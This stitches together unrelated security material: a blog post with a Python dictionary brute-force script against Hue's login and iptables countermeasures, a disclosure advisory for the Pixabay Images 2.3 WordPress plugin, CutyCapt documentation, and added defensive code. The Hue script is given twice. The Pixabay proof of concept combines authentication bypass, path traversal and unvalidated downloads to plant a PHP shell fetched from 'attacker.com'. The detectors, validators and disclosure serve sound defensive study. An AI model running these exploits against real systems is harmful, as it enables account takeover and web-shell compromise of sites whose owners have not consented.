It is important we test the security of these applications so that we can protect my data and your data from the evil-doers who will sell the same information or use it for awful things. Perhaps a criminal can use pilfered data about you to create malware that you will more easily fall prey to. The reason that I have picked Hue as an example of a much larger conversation is because it is pretty, and it does cool things. Hue has a standard user management system that allows the administrator to grant access to certain accounts. Lets crack some Hue accounts! Of course in this article I’m using a Virtual Machine and not testing on live systems in the wild. That would be highly unethical…but the point of this is to help others remember that not all people out there are ethical, and to “scare” people into taking preventive measures to thwart attacks — much like children stories about being good or the boogie man will get you. So, I decided to test the limits and see how easy it would be to crack into a Hue account using old school methods of brute-forcing. As a standard bad practice people use the username ‘admin’ as the default administrative user for their systems. Shall we see if we can crack a user account. ~$ ./hute.py .... .... .... .... .... .... .... .... .... .... .... Success! admin:admin Completed attack at 2014-09-30 16:19:55.113608 Here is the source code for those who care and would like to test their own systems using the same methods in this proof of concept. 
#!/usr/bin/python import sys import requests import datetime from fake_useragent import UserAgent ## CONFIG STARTS HERE ## user = "admin" host = "hostname:port" listfile = "~/dictionaries/top1000-worst-passwords.txt" ## CONFIG ENDS HERE## dictionary = open(listfile) list = dictionary.readlines() words = [ ] print "Initializing dictionary", for entry in list: print('.'), newword = entry.rstrip("\n") words.append(newword) print "Now testing " for password in words: ua = UserAgent().random headers = { "User-Agent" : ua } post = { "username" : user, "password" : password } r = requests.post("http://" + host + "/accounts/login/?next=/", headers=headers, data=post) invalid = r.text.find("Invalid") if invalid == -1: print "\nSuccess! " + user + ":" + password print "Completed test at ", print datetime.datetime.now() sys.exit() else: print "...." print "Attack unsuccessful...Completed at ", print datetime.datetime.now() What next, how do we stop the attacks? At the time of this writing it would seem that Hue does not have a mechanism for two-factor authentication, although there are libraries out there for two factor auth within django. What we can do is protect Hue with some iptables magic. We can use iptables’ recent module to keep an eye out for shady traffic and to act on that traffic: $ iptables -I INPUT -p tcp --dport 8888 -m state --state NEW -m recent --name hue-firewall --update --seconds 30 --hitcount 10 -j DROP ~$ iptables -I INPUT -p tcp --dport 8888 -m state --state NEW -m recent --name hue-firewall --set Above when we have more than 10 immediate hits we will drop the incoming traffic for 30 seconds, thus thwarting any effective bruteforce attempt. It is not full-proof, but definitely going to put a dent in most bruteforce attacks on Hue. The point of this article is to not shame Hue by any means, but to shine light on security in this emerging space. Unfortunately the issue of bruteforce is an age old concern. 
The developers and systems administrators would like to blame the users themselves for choosing such awful passphrases. We can shuffle this around all we want, but it takes only a few lines of code to save the user from hanging themselves, which is the job of the developer. These security lessons have been learned time and time again.

Source
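As an added illustration (not part of the post above), the threshold the iptables recent rule enforces, a source that has made 10 or more login hits inside the last 30 seconds, expressed as a detection over web-server access logs, which is what you would run on the Hue host's logs after the fact or feed into a SIEM. Only the login path /accounts/login/ is taken from the script above; the log lines are constructed for the example, and the IPs, timestamps and the detector itself are assumptions for the illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Apache/nginx combined-log style line: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

LOGIN_PATH = "/accounts/login/"  # Hue's Django login endpoint, as used by the script above


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Timestamp looks like 30/Sep/2014:16:19:40 +0000; the offset is dropped here
    ts = datetime.strptime(m.group("ts").split()[0], "%d/%b/%Y:%H:%M:%S")
    return {"ip": m.group("ip"), "ts": ts, "method": m.group("method"),
            "path": m.group("path"), "status": int(m.group("status"))}


def detect_bruteforce(lines, window_seconds=30, hitcount=10, login_path=LOGIN_PATH):
    """Per-source sliding window over login POSTs.

    Same semantics as `-m recent --update --seconds 30 --hitcount 10`: a source
    trips the moment it has made hitcount or more login POSTs within the last
    window_seconds. Returns {ip: timestamp_of_first_trip}.
    """
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)   # ip -> timestamps of its recent login POSTs
    tripped = {}
    events = [e for e in map(parse_line, lines) if e is not None]
    events.sort(key=lambda e: e["ts"])   # lines from several workers may be interleaved
    for e in events:
        if e["method"] != "POST" or not e["path"].startswith(login_path):
            continue
        q = recent[e["ip"]]
        q.append(e["ts"])
        while q and e["ts"] - q[0] > window:   # expire hits older than the window
            q.popleft()
        if len(q) >= hitcount and e["ip"] not in tripped:
            tripped[e["ip"]] = e["ts"]
    return tripped


def _log_line(ts, ip, method="POST", path="/accounts/login/?next=/"):
    """Build one constructed combined-log line (sample data, not real traffic)."""
    return '%s - - [%s +0000] "%s %s HTTP/1.1" 200 1502 "-" "Mozilla/5.0"' % (
        ip, ts.strftime("%d/%b/%Y:%H:%M:%S"), method, path)


def sample_log():
    """Constructed sample: 10.0.0.7 fires 12 login POSTs in 12 s (one per second);
    10.0.0.9 fetches the form once with GET and logs in twice, a minute apart."""
    base = datetime(2014, 9, 30, 16, 19, 40)
    lines = [_log_line(base + timedelta(seconds=i), "10.0.0.7") for i in range(12)]
    lines.append(_log_line(base + timedelta(seconds=3), "10.0.0.9", method="GET"))
    lines.append(_log_line(base + timedelta(seconds=5), "10.0.0.9"))
    lines.append(_log_line(base + timedelta(seconds=65), "10.0.0.9"))
    return lines


if __name__ == "__main__":
    for ip, when in sorted(detect_bruteforce(sample_log()).items()):
        print("brute-force suspected from %s, threshold crossed at %s" % (ip, when))
```

On the constructed sample the scanner source trips on its tenth POST, nine seconds after its first, while the two legitimate logins never come close; lowering hitcount or widening the window trades false positives against how many guesses an attacker gets before the first alert, exactly the same trade-off as in the iptables rule.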
-
Hadoop User Experience password cracking script. Written in Python.

#!/usr/bin/python
from __future__ import print_function
import sys
import os
import datetime
import requests
from fake_useragent import UserAgent

## CONFIG STARTS HERE ##
user = "admin"
host = "hostname:port"
listfile = "~/dictionaries/top1000-worst-passwords.txt"
## CONFIG ENDS HERE ##

# open() does not expand "~", so expand it explicitly before reading the wordlist
dictionary = open(os.path.expanduser(listfile))
words = []
sys.stdout.write("Initializing dictionary")
for entry in dictionary:
    sys.stdout.write(".")
    words.append(entry.rstrip("\n"))
dictionary.close()
print("")

print("Now testing ")
for password in words:
    # Random User-Agent per request so the attempts do not share one obvious fingerprint
    ua = UserAgent().random
    headers = {"User-Agent": ua}
    post = {"username": user, "password": password}
    r = requests.post("http://" + host + "/accounts/login/?next=/", headers=headers, data=post)
    # Hue's login page answers a failed attempt with a page containing "Invalid";
    # a response without that word is taken as a successful login
    invalid = r.text.find("Invalid")
    if invalid == -1:
        print("\nSuccess! " + user + ":" + password)
        print("Completed test at", datetime.datetime.now())
        sys.exit()
    else:
        print("....")
print("Attack unsuccessful...Completed at", datetime.datetime.now())

Source
-
WordPress Pixabay Images 2.3 XSS / Bypass / Upload / Traversal
Aerosol posted a topic in Exploits
Mogwai Security Advisory MSA-2015-01
----------------------------------------------------------------------
Title: WP Pixabay Images Multiple Vulnerabilities
Product: Pixabay Images (Wordpress Plugin)
Affected versions: 2.3
Impact: high
Remote: yes
Product link: https://wordpress.org/plugins/pixabay-images/
Reported: 14/01/2015
by: Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench)

Vendor's Description of the Software:
----------------------------------------------------------------------
Pixabay Images is a WordPress plugin that lets you pick CC0 public domain pictures from Pixabay and insert them with just a click anywhere on your blog. The images are safe to use, and paying attribution or linking back to the source is not required.

Business recommendation:
----------------------------------------------------------------------
Update to version 2.4

Vulnerability description:
----------------------------------------------------------------------
1) Authentication bypass
The plugin does not correctly check if the user is logged in. Certain code can be called without authentication.

2) Arbitrary file upload
The plugin code does not validate the host in the provided download URL, which allows uploading malicious files, including PHP code.

3) Path Traversal
Certain values are not sanitized before they are used in a file operation. This allows storing files outside of the "download" folder.

4) Cross Site Scripting (XSS)
The generated author link uses unsanitized user values which can be abused for Cross Site Scripting (XSS) attacks.

Proof of concept:
----------------------------------------------------------------------
The following PoC Python script can be used to download PHP files from an attacker-controlled host.
#!/usr/bin/env python
import argparse
import httplib
import urllib
from urlparse import urlparse


def exploit(target_url, shellcode_url):
    target = urlparse(target_url)
    # image_url is fetched without checking its host (issue 2); q ends up in a file
    # path without sanitisation (issue 3), so the "../" walks out of the download folder
    params = urllib.urlencode({'pixabay_upload': 1,
                               'image_url': shellcode_url,
                               'image_user': 'none',
                               'q': 'xxx/../../../../../../mogwai'})
    headers = {"Content-type": "application/x-www-form-urlencoded"}

    print "[+] Sending download request...."
    conn = httplib.HTTPConnection(target.netloc)
    # no session cookie is sent: the handler is reachable unauthenticated (issue 1)
    conn.request("POST", target.path + "/wp-admin/", params, headers)
    response = conn.getresponse()
    response_data = response.read()
    if response.status != 200 and response_data != "Error: File attachment metadata error":
        print "[-] Something went wrong"
        print response_data
        exit()
    conn.close()


# ---- Main code ----------------
parser = argparse.ArgumentParser()
parser.add_argument("target_url", help="The target url, for example http://foo.bar/blog/")
parser.add_argument("shellcode_url", help="The url of the PHP file that should be uploaded, for example: http://attacker.com/shell.php")

print "----------------------------------------------"
print " pixabay upload wordpress plugin exploit PoC"
print " Mogwai security"
print "----------------------------------------------"

arguments = parser.parse_args()
exploit(arguments.target_url, arguments.shellcode_url)

Vulnerable / tested versions:
----------------------------------------------------------------------
Pixabay Images 2.3

Disclosure timeline:
----------------------------------------------------------------------
14/01/2015: Reporting issues to the plugin author
15/01/2015: Release of fixed version (2.4)
19/01/2015: Public advisory

Advisory URL:
----------------------------------------------------------------------
https://www.mogwaisecurity.de/#lab

----------------------------------------------------------------------
Mogwai, IT-Sicherheitsberatung Muench
Steinhoevelstrasse 2/2
89075 Ulm (Germany)
info@mogwaisecurity.de

Source
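Added example, not part of the advisory and not the plugin's own code: the two input checks whose absence issues 2 and 3 describe, written in Python rather than the plugin's PHP so they run stand-alone. The host allow-list (pixabay.com, cdn.pixabay.com), the image-extension allow-list and the filename character set are assumptions for the illustration; the advisory only states that the host is not validated at all and that the value ends up in a file operation unsanitised. The sample inputs are the PoC's own values (an attacker-hosted shell.php and the traversing `q`) plus a benign request constructed for contrast. The missing login check of issue 1 is a one-line framework call and is not shown.

```python
import os
import posixpath
import re
from urllib.parse import urlsplit

# Assumed policy for the illustration (the plugin's real rules are not in the advisory)
ALLOWED_HOSTS = {"pixabay.com", "cdn.pixabay.com"}
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png"}
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}$")  # no separators, no dots: no traversal possible


def validate_image_url(url, allowed_hosts=ALLOWED_HOSTS):
    """Accept only http(s) URLs on an allow-listed host that point at an image.

    Returns (True, extension) or (False, reason). Addresses issue 2: a download URL
    such as http://attacker.example/shell.php is refused before anything is fetched.
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme not allowed: %r" % parts.scheme
    host = (parts.hostname or "").lower()
    if host not in allowed_hosts:
        return False, "host not allowed: %r" % host
    if parts.username or parts.password:
        return False, "credentials embedded in URL"
    ext = posixpath.splitext(parts.path)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        return False, "extension not allowed: %r" % ext
    return True, ext


def safe_target_path(download_dir, name, ext):
    """Map the user-supplied name onto a file strictly inside download_dir.

    Returns (True, path) or (False, reason). Addresses issue 3: a name such as
    'xxx/../../../../../../mogwai' fails the character check outright, and the
    resolved path is re-checked against the directory as a second line of defence.
    """
    if not SAFE_NAME.match(name):
        return False, "filename contains characters outside [A-Za-z0-9_-]"
    base = os.path.realpath(download_dir)
    target = os.path.realpath(os.path.join(base, name + ext))
    if os.path.commonpath([base, target]) != base:
        return False, "resolved path escapes download directory"
    return True, target


def check_upload_request(image_url, q, download_dir="downloads"):
    """Validate the two untrusted fields of a pixabay_upload request together.

    Returns (True, target_path) when the request is safe to service, otherwise
    (False, reason). Fetching and saving the file is left to the caller.
    """
    ok, result = validate_image_url(image_url)
    if not ok:
        return False, result
    return safe_target_path(download_dir, q, result)


# Constructed sample inputs: the PoC's own values and one benign request
SAMPLES = [
    ("http://attacker.example/shell.php", "xxx/../../../../../../mogwai"),
    ("https://pixabay.com/get/abc123.jpg", "xxx/../../../../../../mogwai"),
    ("https://pixabay.com/get/abc123.jpg", "abc123"),
]

if __name__ == "__main__":
    for url, q in SAMPLES:
        ok, detail = check_upload_request(url, q)
        print("%-4s image_url=%s q=%s -> %s" % ("OK" if ok else "DENY", url, q, detail))
```

The extension is taken from the validated URL, never from the user-supplied name, so even a permitted host cannot be used to drop a .php file, and the host check uses the parsed hostname so that a URL such as https://pixabay.com@attacker.example/x.jpg is seen for what it is.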
-
CutyCapt

CutyCapt is a small cross-platform command-line utility to capture WebKit's rendering of a web page into a variety of vector and bitmap formats, including SVG, PDF, PS, PNG, JPEG, TIFF, GIF, and BMP. See IECapt for a similar tool based on Internet Explorer.

Samples
Here are some samples of CutyCapt generated renderings:
PNG Snapshot of http://digg.com
PNG Snapshot of css Zen Garden: The Beauty in CSS Design
SVG Snapshot of MSDN Silverlight Dev Center
PDF Snapshot of MSDN Silverlight Dev Center

Status
CutyCapt has a number of known quirks, most of which are caused by problems with Qt and/or WebKit. For example, while plugin support can be enabled, and the plugins execute properly, their rendering cannot be captured on some platforms. Use with caution.

Requirements
CutyCapt depends on Qt 4.4.0+.

Download
Help wanted! Previously I have used MinGW to make a static Qt build and correspondingly single-file CutyCapt executables for Windows. However, MinGW no longer supports single-file executables for threaded applications, they require redistributing a DLL instead, and Qt no longer supports static builds of QtWebKit. Similarly, if I just used Visual Studio 2010, as I do for normal development, proper builds would have to redistribute Microsoft runtime DLLs. Anyone who wants to prepare CutyCapt.exe + *.DLL builds is most welcome to join the project to do so, or alternatively provide them externally which I would then link from here. Let me know if you are interested. Thanks.
CutyCapt-Win32-2010-04-26.zip (7MB, .exe for Win32 systems)
CutyCapt-Win32-2008-06-11.zip (6MB, .exe for Win32 systems)

Source code
The source code is available in the SVN repository (download tarball).
Usage
Open a command prompt and ask for help:

% CutyCapt --help
-----------------------------------------------------------------------------
Usage: CutyCapt --url=http://www.example.org/ --out=localfile.png
-----------------------------------------------------------------------------
  --help                         Print this help page and exit
  --url=<url>                    The URL to capture (http:...|file:...|...)
  --out=<path>                   The target file (.png|pdf|ps|svg|jpeg|...)
  --out-format=<f>               Like extension in --out, overrides heuristic
  --min-width=<int>              Minimal width for the image (default: 800)
  --min-height=<int>             Minimal height for the image (default: 600)
  --max-wait=<ms>                Don't wait more than (default: 90000, inf: 0)
  --delay=<ms>                   After successful load, wait (default: 0)
  --user-styles=<url>            Location of user style sheet, if any
  --header=<name>:<value>        request header; repeatable; some can't be set
  --method=<get|post|put>        Specifies the request method (default: get)
  --body-string=<string>         Unencoded request body (default: none)
  --body-base64=<base64>         Base64-encoded request body (default: none)
  --app-name=<name>              appName used in User-Agent; default is none
  --app-version=<version>        appVers used in User-Agent; default is none
  --user-agent=<string>          Override the User-Agent header Qt would set
  --javascript=<on|off>          JavaScript execution (default: on)
  --java=<on|off>                Java execution (default: unknown)
  --plugins=<on|off>             Plugin execution (default: unknown)
  --private-browsing=<on|off>    Private browsing (default: unknown)
  --auto-load-images=<on|off>    Automatic image loading (default: on)
  --js-can-open-windows=<on|off> Script can open windows? (default: unknown)
  --js-can-access-clipboard=<on|off> Script clipboard privs (default: unknown)
  --print-backgrounds=<on|off>   Backgrounds in PDF/PS output (default: off)
-----------------------------------------------------------------------------
<f> is svg,ps,pdf,itext,html,rtree,png,jpeg,mng,tiff,gif,bmp,ppm,xbm,xpm
-----------------------------------------------------------------------------

Build Instructions
If your system is set up to compile Qt applications, building CutyCapt should be a simple matter of checking out the source code and running qmake and your version of make. As an example, if you are running Ubuntu Hardy Heron and have configured the system to use packages from hardy-backports, the following should do:

% sudo apt-get install subversion libqt4-webkit libqt4-dev g++
% svn co https://cutycapt.svn.sourceforge.net/svnroot/cutycapt
% cd cutycapt/CutyCapt
% qmake
% make
% ./CutyCapt --url=http://www.example.org --out=example.png

Using CutyCapt without X server
You cannot use CutyCapt without an X server, but you can use e.g. Xvfb as a light-weight server if you are not running an interactive graphical desktop environment. For example, you could use:

% xvfb-run --server-args="-screen 0, 1024x768x24" ./CutyCapt --url=... --out=...

Author
Björn Höhrmann bjoern@hoehrmann.de
CutyCapt - A Qt WebKit Web Page Rendering Capture Utility
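Added example, not part of the CutyCapt page: a small Python wrapper of the kind used to batch-screenshot hosts during recon, which assembles the CutyCapt command line from the options documented above with the riskier features switched off and runs it under xvfb-run as the page describes. The flags used (--url, --out, --out-format, --max-wait, --javascript, --java, --plugins, --user-agent) and the output-format list are taken from the help text; the scheme allow-list and the refusal of file: URLs are this wrapper's own policy, since CutyCapt itself captures file:... URLs, which matters as soon as the URL list comes from someone else. The example only builds and runs the command; it does not bundle CutyCapt.

```python
import os
import re
import shlex
import subprocess
from urllib.parse import urlsplit

# Output formats listed in CutyCapt's --help (<f>)
OUT_FORMATS = {"svg", "ps", "pdf", "itext", "html", "rtree", "png", "jpeg", "mng",
               "tiff", "gif", "bmp", "ppm", "xbm", "xpm"}

# Wrapper policy (assumption for this example): only remote http(s) URLs with a host.
ALLOWED_SCHEMES = ("http", "https")


def is_capturable_url(url):
    """True only for http(s) URLs with a host; refuses file:, data:, javascript: and the like."""
    parts = urlsplit(url)
    return parts.scheme in ALLOWED_SCHEMES and bool(parts.hostname)


def output_format(out_path):
    """Return the format CutyCapt would pick from the extension, or None if unsupported."""
    ext = os.path.splitext(out_path)[1].lstrip(".").lower()
    return ext if ext in OUT_FORMATS else None


def build_capture_cmd(url, out_path, max_wait_ms=20000, user_agent=None,
                      use_xvfb=True, cutycapt="./CutyCapt"):
    """Build the argv for one capture with JavaScript, Java and plugins off.

    Raises ValueError for URLs or output names the wrapper will not accept.
    """
    if not is_capturable_url(url):
        raise ValueError("refusing to capture non-http(s) URL: %r" % url)
    fmt = output_format(out_path)
    if fmt is None:
        raise ValueError("unsupported output extension: %r" % out_path)
    cmd = [
        cutycapt,
        "--url=" + url,
        "--out=" + out_path,
        "--out-format=" + fmt,
        "--max-wait=%d" % max_wait_ms,   # never hang on a page that keeps loading
        "--javascript=off",              # do not execute the target's scripts
        "--plugins=off",
        "--java=off",
    ]
    if user_agent:
        cmd.append("--user-agent=" + user_agent)
    if use_xvfb:
        # Headless X server, as the page recommends for machines without a desktop
        cmd = ["xvfb-run", "--server-args=-screen 0, 1024x768x24"] + cmd
    return cmd


def capture(url, out_path, **kwargs):
    """Run one capture; returns the exit code, or 127 if xvfb-run/CutyCapt is not installed."""
    cmd = build_capture_cmd(url, out_path, **kwargs)
    print("$ " + " ".join(shlex.quote(a) for a in cmd))
    try:
        return subprocess.call(cmd)
    except OSError as err:
        print("cannot run %s: %s" % (cmd[0], err))
        return 127


def capture_all(urls, out_dir="shots"):
    """Screenshot a list of URLs into out_dir, naming files by host:port; skips bad URLs.

    Returns (captured, skipped) so the caller can report on both.
    """
    os.makedirs(out_dir, exist_ok=True)
    captured, skipped = [], []
    for url in urls:
        if not is_capturable_url(url):
            skipped.append(url)
            continue
        name = re.sub(r"[^A-Za-z0-9._-]", "_", urlsplit(url).netloc)
        out_path = os.path.join(out_dir, name + ".png")
        if capture(url, out_path) == 0:
            captured.append(out_path)
        else:
            skipped.append(url)
    return captured, skipped


if __name__ == "__main__":
    done, bad = capture_all(["http://www.example.org/", "file:///etc/passwd",
                             "https://www.example.org:8443/"])
    print("captured:", done)
    print("skipped:", bad)
```

Switching JavaScript and plugins off costs fidelity on script-heavy pages (turn them back on deliberately, per target, with --javascript=on), but it means a crafted page cannot use the capture box as a browser, and the --max-wait bound keeps one slow host from stalling a long target list.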